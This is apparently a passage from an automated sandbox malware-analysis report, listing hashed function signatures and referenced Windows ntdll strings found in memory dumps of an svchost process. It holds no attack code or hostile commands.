                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                              • API String ID: 0-1391187441
                                                                              • Opcode ID: 3b4eac729346533caa0001fe593226c7643f048062a405b13bbb52c5ab3a4456
                                                                              • Instruction ID: b6a9564966e3799282a2e4182c10809bb47ef469efacd18763b38071f4bfc628
                                                                              • Opcode Fuzzy Hash: 3b4eac729346533caa0001fe593226c7643f048062a405b13bbb52c5ab3a4456
                                                                              • Instruction Fuzzy Hash: D4316076A00214EFCB11EB5AC985FAFBBB9EF45B20F14405BE815AB291D770ED40CA71
                                                                              Strings
                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 03A4327D
                                                                              • HEAP[%wZ]: , xrefs: 03A43255
                                                                              • HEAP: , xrefs: 03A43264
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                              • API String ID: 0-617086771
                                                                              • Opcode ID: 3cc228a040e33d32adc04e4d6deb8ebdf9ab513057718a3e064db2683bee3292
                                                                              • Instruction ID: b14979d86a1559113c921aa3d9c36d5cd517f9b81941745c007e2f4a2d3c5e5b
                                                                              • Opcode Fuzzy Hash: 3cc228a040e33d32adc04e4d6deb8ebdf9ab513057718a3e064db2683bee3292
                                                                              • Instruction Fuzzy Hash: 2B929A74A042499FDF25CF68C5447AEBBF1EF89300F1884AEE899AB391D735A941CF50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              • Opcode ID: ea3eff02f1e1ed18900be1174038b8a668a61c27a6ee3f774df4aecb9df3d2e2
                                                                              • Instruction ID: 6ea9363dd267c2726302b933c256626521b982c24f16fff8d4d22345f4f04886
                                                                              • Opcode Fuzzy Hash: ea3eff02f1e1ed18900be1174038b8a668a61c27a6ee3f774df4aecb9df3d2e2
                                                                              • Instruction Fuzzy Hash: A522FB70A00641AFEB26CF28C495B7AFBF5EF46704F18849BE4559B392E735E881CB50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-4253913091
                                                                              • Opcode ID: 2f60c4a7edbeed5a55c03bf9c2660473839fa7f6795f28e76cc49a89ffac88f5
                                                                              • Instruction ID: 3347c6cf4e671669eb5ed9f59dc216b8eecbff1f1a6b9277a192a906454854d8
                                                                              • Opcode Fuzzy Hash: 2f60c4a7edbeed5a55c03bf9c2660473839fa7f6795f28e76cc49a89ffac88f5
                                                                              • Instruction Fuzzy Hash: 36F1DE34A00605DFEB19DF68C980B6AF7F5FF85304F1881AAE516AB391D734E981CB90
                                                                              Strings
                                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03A31728
                                                                              • HEAP[%wZ]: , xrefs: 03A31712
                                                                              • HEAP: , xrefs: 03A31596
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                              • API String ID: 0-3178619729
                                                                              • Opcode ID: dc43e685c58d0b7ef1f9aa47ca2879b7416dc398e1b35d61aadc38441cc70935
                                                                              • Instruction ID: 610709e2ce17c858ad566b8fec25c91aa3b42083f67f7ac14f69ba074d6f8fc5
                                                                              • Opcode Fuzzy Hash: dc43e685c58d0b7ef1f9aa47ca2879b7416dc398e1b35d61aadc38441cc70935
                                                                              • Instruction Fuzzy Hash: 2EE1C070A046469FDB29EF68C491B7ABBF5AF4A300F18855FF4968B345E734E940CB50
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                              • API String ID: 0-1145731471
                                                                              • Opcode ID: 538e78fdc4723a15f64f9a9e6155d2b102e898184a64017ee3edb9e8f0c234f6
                                                                              • Instruction ID: 1da94759f46221035dff2fa4eafc4e17346b3cece483057297a480bc1dc9850c
                                                                              • Opcode Fuzzy Hash: 538e78fdc4723a15f64f9a9e6155d2b102e898184a64017ee3edb9e8f0c234f6
                                                                              • Instruction Fuzzy Hash: F8B16A79A056449FEF25CF69C980BADB7B6EF45714F1889AFE451EB380D730A840CB60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                              • API String ID: 0-2391371766
                                                                              • Opcode ID: eb8f2a6f86563541afb02f76a6aaf210330a9d89395303243bfa9c0ed49e76c5
                                                                              • Instruction ID: 23ee4bd00c63a88fc5779ea660b2770205c6327d03870154d0e23e6c51999e3b
                                                                              • Opcode Fuzzy Hash: eb8f2a6f86563541afb02f76a6aaf210330a9d89395303243bfa9c0ed49e76c5
                                                                              • Instruction Fuzzy Hash: 03B19D79604341AFEB21DF54C980BABB7FCAB49714F15092FFA409B291D771E844CB92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $@
                                                                              • API String ID: 0-1077428164
                                                                              • Opcode ID: e61d0e1ced47722e557a0094eba9a686f4cc790bf5d934f84ceb587736316d73
                                                                              • Instruction ID: 2c2a95ef37f5fc73e27ac2bd630dcec5057f28a74874ed75174b36e260d49be9
                                                                              • Opcode Fuzzy Hash: e61d0e1ced47722e557a0094eba9a686f4cc790bf5d934f84ceb587736316d73
                                                                              • Instruction Fuzzy Hash: 05C27D716087419FEB25CF24C880BABBBE5AF88754F08896FF989E7250D735D804CB52
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                              • API String ID: 0-2779062949
                                                                              • Opcode ID: ef7e99afa1ae6a867ff19f4e9d6456bc6a91a0ad7d7af920c152457d35af27ac
                                                                              • Instruction ID: c4276869602d242dd173edf97e8cda97989e8d72cd8941fe8613abd6a72309ce
                                                                              • Opcode Fuzzy Hash: ef7e99afa1ae6a867ff19f4e9d6456bc6a91a0ad7d7af920c152457d35af27ac
                                                                              • Instruction Fuzzy Hash: 7FA18C759012299BDB31EF24CD88BEAF7B8EF44710F1405EAE909AB250D7359E85CF60
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                              • API String ID: 0-318774311
                                                                              • Opcode ID: 8adc1c9c8dbb606dc6484b402da17b3f83216242941387013c22e090524ddfcf
                                                                              • Instruction ID: ed5dfdd812346fdbc2f1b0aa39f5ab6ff36f9d0dfcfad91f7de8a22f3d420e0b
                                                                              • Opcode Fuzzy Hash: 8adc1c9c8dbb606dc6484b402da17b3f83216242941387013c22e090524ddfcf
                                                                              • Instruction Fuzzy Hash: 81818E79618380AFDB11DB14C984B6AB7E8FF85750F08892EF9909B3D0D778D904CB52
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %$&$@
                                                                              • API String ID: 0-1537733988
                                                                              • Opcode ID: 83ca95458df1b92bf84ba17eab3df040423cf43eae41263482d164b6a585f6d8
                                                                              • Instruction ID: daa09888330b133a13fbe6ec16afb9d69a637325e55ccae17112f64fbf2504e3
                                                                              • Opcode Fuzzy Hash: 83ca95458df1b92bf84ba17eab3df040423cf43eae41263482d164b6a585f6d8
                                                                              • Instruction Fuzzy Hash: 0071D1705087019FC754DF24CA84A2BFBE9FF85618F144A1FE4AA8B290D730D905CB96
                                                                              Strings
                                                                              • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03B0B82A
                                                                              • GlobalizationUserSettings, xrefs: 03B0B834
                                                                              • TargetNtPath, xrefs: 03B0B82F
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                              • API String ID: 0-505981995
                                                                              • Opcode ID: 15636f226af721803e43a3b71052b6dc90aeef50f55a95cf54d8f7be59142851
                                                                              • Instruction ID: f8ac4c2abfb6c65be880654ea99514b9fe64b38722deef5a26e131334f0ca0b7
                                                                              • Opcode Fuzzy Hash: 15636f226af721803e43a3b71052b6dc90aeef50f55a95cf54d8f7be59142851
                                                                              • Instruction Fuzzy Hash: A6617F76D41229ABDB21DF54DC88B9ABBB8EF04714F0101E5A508AB390DB74DE84CF90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655581470.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: gfff$gfff$q
                                                                              • API String ID: 0-1272973491
                                                                              • Opcode ID: 9a697ed8a4d1acd69a14ec21015b18f02ba18013c69f9d226dcf790d7fb4a876
                                                                              • Instruction ID: aece826f52c482b9cea20f7c878199675417686b53cf3370e1d0dbd136eb48b2
                                                                              • Opcode Fuzzy Hash: 9a697ed8a4d1acd69a14ec21015b18f02ba18013c69f9d226dcf790d7fb4a876
                                                                              • Instruction Fuzzy Hash: 19511932B0005507DB2C891DDCA16AA6297E7E8315F28823FE95BEF7F0E93DAD414684
                                                                              Strings
                                                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03A8E6C6
                                                                              • HEAP[%wZ]: , xrefs: 03A8E6A6
                                                                              • HEAP: , xrefs: 03A8E6B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                              • API String ID: 0-1340214556
                                                                              • Opcode ID: 4d3bd3db839c50ff4c947501fc33054a2151778eeb5004cd27629cb3fbadbb33
                                                                              • Instruction ID: 036c4df1b96919cc5b212d43e1c54dd64e74265abfca75975e59e93e7f8505a5
                                                                              • Opcode Fuzzy Hash: 4d3bd3db839c50ff4c947501fc33054a2151778eeb5004cd27629cb3fbadbb33
                                                                              • Instruction Fuzzy Hash: FF51C135604794EFD712EB68C944FAAFBF8EF05300F0845A6E9518B792D774E950CB20
                                                                              Strings
                                                                              • HEAP[%wZ]: , xrefs: 03ADDC12
                                                                              • HEAP: , xrefs: 03ADDC1F
                                                                              • Heap block at %p modified at %p past requested size of %Ix, xrefs: 03ADDC32
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                              • API String ID: 0-3815128232
                                                                              • Opcode ID: 0a60b769703dbbd0552a47eb6e7800b8a31878e67183ace78e2219ebf167883d
                                                                              • Instruction ID: 8f12bc6512ad7c7b5b96af41c0907455de36936ffaef0503e1be773aac742157
                                                                              • Opcode Fuzzy Hash: 0a60b769703dbbd0552a47eb6e7800b8a31878e67183ace78e2219ebf167883d
                                                                              • Instruction Fuzzy Hash: B15122352046508EE374DB2EC848772B7F2EF45648F08888FE4D38F685D276E846DB21
                                                                              Strings
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03AA82E8
                                                                              • Failed to reallocate the system dirs string !, xrefs: 03AA82D7
                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 03AA82DE
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-1783798831
                                                                              • Opcode ID: 750bab00a3f7310cacd02f77dacd9aae5ae8c269e47c5f6976a2867153646bd6
                                                                              • Instruction ID: 2658679e4dca39bd962dd5367f5f5476536a5f439d4463705aadd68dadff5faa
                                                                              • Opcode Fuzzy Hash: 750bab00a3f7310cacd02f77dacd9aae5ae8c269e47c5f6976a2867153646bd6
                                                                              • Instruction Fuzzy Hash: 3A41F3B6944310ABC721EB68DA44B5B7BE8FF49764F044A2BF988D7250E774D8108B91
                                                                              Strings
                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 03AA1B4A
                                                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03AA1B39
                                                                              • LdrpAllocateTls, xrefs: 03AA1B40
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                              • API String ID: 0-4274184382
                                                                              • Opcode ID: 5dce3385c75fc70b85e5e0466c9316018fecc1f53ead84e4fb7967415fe17fb7
                                                                              • Instruction ID: a61f9d262b8ab5298d84ca0675ea41bac60394a64342d3c4f7b09d47edaecf1a
                                                                              • Opcode Fuzzy Hash: 5dce3385c75fc70b85e5e0466c9316018fecc1f53ead84e4fb7967415fe17fb7
                                                                              • Instruction Fuzzy Hash: 1541587AA00608AFCB25DFA8C941BAEFBF5FF49714F14811AE405AB350D775A800CF90
                                                                              Strings
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 03AEC1C5
                                                                              • PreferredUILanguages, xrefs: 03AEC212
                                                                              • @, xrefs: 03AEC1F1
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                              • API String ID: 0-2968386058
                                                                              • Opcode ID: 0060061628eddba3190762393f871d2114d6e0e443597bb9f5e779a76facdcef
                                                                              • Instruction ID: 5ab04890a3e24fb31e98bcc2c766acfd892471d12dceba8989b9b751fc7dc686
                                                                              • Opcode Fuzzy Hash: 0060061628eddba3190762393f871d2114d6e0e443597bb9f5e779a76facdcef
                                                                              • Instruction Fuzzy Hash: 72418E76E00209EFDF15EBD8C995FEEB7BCAB44710F04406BE905BB290D7749A448B90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                              • API String ID: 0-1373925480
                                                                              • Opcode ID: 8591aaa513ba8c5a1e86fc9481517d28db50bd95d2aa64ace21365b6f401317f
                                                                              • Instruction ID: 17b1b91cf4f3f09ddc2db6c0ad6f421ffe70fffb75e7dbf7771a928249ab3641
                                                                              • Opcode Fuzzy Hash: 8591aaa513ba8c5a1e86fc9481517d28db50bd95d2aa64ace21365b6f401317f
                                                                              • Instruction Fuzzy Hash: E84111359147888BEB26DBA6C964BADBBB8EF99340F18045FD841EF381D7348901CB14
                                                                              Strings
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03AB4899
                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03AB4888
                                                                              • LdrpCheckRedirection, xrefs: 03AB488F
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                              • API String ID: 0-3154609507
                                                                              • Opcode ID: b2497557e9226a9844dc6457fcc17b8839e7843e4b6f21c0f43e2e0fb4f399d7
                                                                              • Instruction ID: 781f91ffec14b80e1bdf07fd1a3660d804d8cbcf49958b23de19f10f9d4ff7cf
                                                                              • Opcode Fuzzy Hash: b2497557e9226a9844dc6457fcc17b8839e7843e4b6f21c0f43e2e0fb4f399d7
                                                                              • Instruction Fuzzy Hash: B341A232A047509FCB21CFAAD940AA6B7FCBB4E650B09065EEC589B353D731D850CB91
                                                                              Strings
                                                                              • RtlCreateActivationContext, xrefs: 03AA29F9
                                                                              • SXS: %s() passed the empty activation context data, xrefs: 03AA29FE
                                                                              • Actx , xrefs: 03A633AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                              • API String ID: 0-859632880
                                                                              • Opcode ID: 3eeb9c39c38538ffcf42d09559466c9b4f295d664773738efd7730bd51e6b7c4
                                                                              • Instruction ID: 90cc076018201ecea3f90f7c8e04fde8160ee720a7a6b78ea7e0bb2244057c5d
                                                                              • Opcode Fuzzy Hash: 3eeb9c39c38538ffcf42d09559466c9b4f295d664773738efd7730bd51e6b7c4
                                                                              • Instruction Fuzzy Hash: 6C3124366007059FDF26DF58C884B9AB7A4FB44711F09886BED059F2E2CB70D852CB90
                                                                              Strings
                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 03AA1A51
                                                                              • LdrpInitializeTls, xrefs: 03AA1A47
                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 03AA1A40
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                              • API String ID: 0-931879808
                                                                              • Opcode ID: 8217e44685d9c5d6e2ad1512c87eab52bda18691300166ef326b118a7a8603a2
                                                                              • Instruction ID: 32431d5cc2a7f355dff79ad443be9cb31ff9457863e162745fd04e236378f6ce
                                                                              • Opcode Fuzzy Hash: 8217e44685d9c5d6e2ad1512c87eab52bda18691300166ef326b118a7a8603a2
                                                                              • Instruction Fuzzy Hash: 2731F87AA00200BBDB30DB58CA45F7ABABCFB55758F04066FE505AB680E774AD048790
                                                                              Strings
                                                                              • BuildLabEx, xrefs: 03A7130F
                                                                              • @, xrefs: 03A712A5
                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03A7127B
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                              • API String ID: 0-3051831665
                                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                              • Instruction ID: a8b8bbb8635f4c2b3293b378a0f0205e4696ba5b75bacd31a1d16628ac6f4bac
                                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                              • Instruction Fuzzy Hash: D6316F76A00619AFDB11EF95CD84EAFBBBDEB84750F004427E914AB260D730DA058B90
                                                                              Strings
                                                                              • Process initialization failed with status 0x%08lx, xrefs: 03AB20F3
                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03AB2104
                                                                              • LdrpInitializationFailure, xrefs: 03AB20FA
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 0-2986994758
                                                                              • Opcode ID: 06262e8dba9930775aae76ff1c29c3f593c69b0380f494ab1d12a34f2db43fab
                                                                              • Instruction ID: aef50762d6a564b8665e7659e57b1d488da50fa94125045cb761eaa95823ce30
                                                                              • Opcode Fuzzy Hash: 06262e8dba9930775aae76ff1c29c3f593c69b0380f494ab1d12a34f2db43fab
                                                                              • Instruction Fuzzy Hash: C9F02835640308BFD720E70CDD42FD9776CEB40B48F04086BF6006B682D2F0E510CA50
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: #%u
                                                                              • API String ID: 48624451-232158463
                                                                              • Opcode ID: f6216e98892603d10145e9ee0fb0afc33c6f6f31a2a1673eac4546dfa14edfb0
                                                                              • Instruction ID: 8f770352b08b0b1f9371c788241d3551c7c65bfafa368bf9bbee186269fbe6fe
                                                                              • Opcode Fuzzy Hash: f6216e98892603d10145e9ee0fb0afc33c6f6f31a2a1673eac4546dfa14edfb0
                                                                              • Instruction Fuzzy Hash: C3715A75A002499FDF01DFA9DA94BAEB7F8AF48304F15416AE901AB351EB34ED01CB60
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: kLsE
                                                                              • API String ID: 3446177414-3058123920
                                                                              • Opcode ID: d396464b4d63fe9ccc76103b2cf373d68c36f1bd0b1cbb310f7dd4af0edb010b
                                                                              • Instruction ID: 855d1f489da0e14072bb88a84c01dc8d93171f355f2b0ef998dc5bc328983198
                                                                              • Opcode Fuzzy Hash: d396464b4d63fe9ccc76103b2cf373d68c36f1bd0b1cbb310f7dd4af0edb010b
                                                                              • Instruction Fuzzy Hash: 494153325013504AE335FF65EA84BA97BA4AB10B2CF18032EFDA18F6D9CBB54481C791
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@
                                                                              • API String ID: 0-149943524
                                                                              • Opcode ID: 0e9d468387df5cb8c219825662c0e4d5ec99b6754e20cc715079c1a7964f4e25
                                                                              • Instruction ID: ad7057c915d896e68f9593e13577b879d61b08ddc5b21a22d9523fd04d0f494e
                                                                              • Opcode Fuzzy Hash: 0e9d468387df5cb8c219825662c0e4d5ec99b6754e20cc715079c1a7964f4e25
                                                                              • Instruction Fuzzy Hash: 113277749083118BDB28CF19C594B3AF7E5AFCA750F18492FF9959B2A0E734D844CB92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @4Dw@4Dw$PATH
                                                                              • API String ID: 0-2254449710
                                                                              • Opcode ID: 4e3a4d1c5f9cbe381c82728a7e0f2c0eb21af93acef93ad5a4ecd2da6f770ae8
                                                                              • Instruction ID: 2a963f764ed2de4f2c4e31656ad1c2685209a33c935d619a4681d83f28ec82f4
                                                                              • Opcode Fuzzy Hash: 4e3a4d1c5f9cbe381c82728a7e0f2c0eb21af93acef93ad5a4ecd2da6f770ae8
                                                                              • Instruction Fuzzy Hash: 61F1C079D04218DBCF25DF98D981ABEB7B5FF89700F48812AF445AB390D774A841CB61
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.2655884928.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `$`
                                                                              • API String ID: 0-197956300
                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                              • Instruction ID: 43f70fa5d34d56a64a5fcdc68060a6d8f791d41cfd8d07da9d1eb43c14c6e85b
